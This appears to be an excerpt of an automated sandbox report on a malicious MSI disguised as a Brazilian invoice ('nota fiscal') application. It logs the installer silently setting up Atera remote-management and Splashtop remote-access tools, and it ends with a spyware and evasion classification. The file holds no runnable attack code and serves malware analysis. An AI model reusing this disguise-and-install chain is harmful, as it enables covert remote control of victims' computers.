                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5085.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI5885.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9409.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA7C1.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA8AC.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIAC76.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIADBF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICA70.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICA80.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICB4C.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICBAB.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\692c50.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID178.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI2D79.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2D79.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI2FBD.tmp-\CustomAction.configJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-Jump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\AlphaControlAgentInstallation.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\Newtonsoft.Json.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\System.Management.dllJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI3FBB.tmp-\CustomAction.configJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI56F2.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5085.tmp-\CustomAction.config
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\Installer\MSI5885.tmp-\CustomAction.config
                                Source: C:\Windows\Temp\SplashtopStreamer.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSystemTools.exe.log
                                Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI2D79.tmpJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE49C22035_2_00007FFDEE49C220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE45224035_2_00007FFDEE452240
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE463EB035_2_00007FFDEE463EB0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE487EA035_2_00007FFDEE487EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE495EA035_2_00007FFDEE495EA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47FED035_2_00007FFDEE47FED0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E7EC035_2_00007FFDEE3E7EC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE427E7035_2_00007FFDEE427E70
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE419F3035_2_00007FFDEE419F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE475F2035_2_00007FFDEE475F20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F7F3035_2_00007FFDEE3F7F30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE43FEF035_2_00007FFDEE43FEF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4CBCD035_2_00007FFDEE4CBCD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4BDCC035_2_00007FFDEE4BDCC0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4B7D2035_2_00007FFDEE4B7D20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE429CF035_2_00007FFDEE429CF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F5E5035_2_00007FFDEE3F5E50
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE413E1035_2_00007FFDEE413E10
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE415AD035_2_00007FFDEE415AD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE419A6035_2_00007FFDEE419A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE497A6035_2_00007FFDEE497A60
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE447B3035_2_00007FFDEE447B30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE483AF035_2_00007FFDEE483AF0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE429BA035_2_00007FFDEE429BA0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4CDB8035_2_00007FFDEE4CDB80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE523C2035_2_00007FFDEE523C20
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40BBE035_2_00007FFDEE40BBE0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4418DA35_2_00007FFDEE4418DA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE40D91035_2_00007FFDEE40D910
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE44B9F035_2_00007FFDEE44B9F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4D56D035_2_00007FFDEE4D56D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE48169035_2_00007FFDEE481690
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE48772035_2_00007FFDEE487720
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4536E035_2_00007FFDEE4536E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42D77035_2_00007FFDEE42D770
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE52F79035_2_00007FFDEE52F790
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE43F78035_2_00007FFDEE43F780
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE53184035_2_00007FFDEE531840
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3FD83035_2_00007FFDEE3FD830
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E74B035_2_00007FFDEE3E74B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E347435_2_00007FFDEE3E3474
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E955C35_2_00007FFDEE3E955C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE42F63035_2_00007FFDEE42F630
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ED63435_2_00007FFDEE3ED634
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3F564035_2_00007FFDEE3F5640
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE44B64735_2_00007FFDEE44B647
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3ED28435_2_00007FFDEE3ED284
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47D35035_2_00007FFDEE47D350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3EF34035_2_00007FFDEE3EF340
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4093D035_2_00007FFDEE4093D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47B37035_2_00007FFDEE47B370
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4BF3E035_2_00007FFDEE4BF3E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE5150F035_2_00007FFDEE5150F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE44F1B035_2_00007FFDEE44F1B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE3E11B035_2_00007FFDEE3E11B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE47917035_2_00007FFDEE479170
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE45F22035_2_00007FFDEE45F220
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFDEE4F320035_2_00007FFDEE4F3200
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B38D56C35_2_00007FFD9B38D56C
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B39013D35_2_00007FFD9B39013D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5A32A635_2_00007FFD9B5A32A6
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5AF08835_2_00007FFD9B5AF088
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5AADD835_2_00007FFD9B5AADD8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B5A24E835_2_00007FFD9B5A24E8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6F2BE835_2_00007FFD9B6F2BE8
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6B87CD35_2_00007FFD9B6B87CD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6C3CF135_2_00007FFD9B6C3CF1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B6C0D9535_2_00007FFD9B6C0D95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B770B7735_2_00007FFD9B770B77
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B774F8835_2_00007FFD9B774F88
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B92466535_2_00007FFD9B924665
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B910E6935_2_00007FFD9B910E69
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B91720935_2_00007FFD9B917209
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B91D10835_2_00007FFD9B91D108
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B91A4FB35_2_00007FFD9B91A4FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 35_2_00007FFD9B9247F035_2_00007FFD9B9247F0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDEE531B70 appears 102 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDEE531D30 appears 114 times
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: String function: 00007FFDEE5306B0 appears 145 times
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                Source: APLICATIVO-WINDOWS-NOTA-FISCAL.msiBinary or memory string: OriginalFilenamewixca.dll\ vs APLICATIVO-WINDOWS-NOTA-FISCAL.msi
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: Commandline size = 2930
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: Commandline size = 2930
                                Source: 35.2.AgentPackageMonitoring.exe.1f71cd60000.1.unpack, type: UNPACKEDPEMatched rule: yara_runascs author = Sekoia.io, creation_date = 2023-08-23, classification = TLP:CLEAR, version = 1.0, id = 1720f042-2cc6-4ef1-b66c-fe8a4214366a
                                Source: ICSharpCode.SharpZipLib.dll.1.dr, InflaterInputBuffer.csCryptographic APIs: 'TransformBlock'
                                Source: ICSharpCode.SharpZipLib.dll.1.dr, DeflaterOutputStream.csCryptographic APIs: 'TransformBlock'
                                Source: ICSharpCode.SharpZipLib.dll.1.dr, ZipAESTransform.csCryptographic APIs: 'TransformBlock'
                                Source: AteraAgent.exe.1.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                                Source: AteraAgent.exe0.1.dr, SignatureValidator.csBase64 encoded string: 'MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0YmxeR/2wifvwd/MQXb/5tsLsvlMs50tmraklX8MKsU1EgEpRZ+W0Ro1ZHoLhQG53oq9hPz9bmJge78yZr6l1QJWz6wCj+yQUxM5f0gt4fHEf2yA94Tklnds7JPr2vQRb5rjAnxnt7722oWFc1bxFFsIcIhOI/EHYCE0qSPE1pKMXALkHZYoDQEFUu3YgEc0Oo7ClJNFrB75g6tVZRqGKxVvYQBb9zKDxhBRnDkhZuB7D1gRaR9PNwCr7tVtPt40c+CCf5ktUkeu4JzaiEipWvKYgRvotqsFtZF5uFso2UmdvxO+lIw9i/GPDfgS4JhKu/Y9lCuaan+xEluhSK0vpQIDAQAB'
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@108/678@0/11
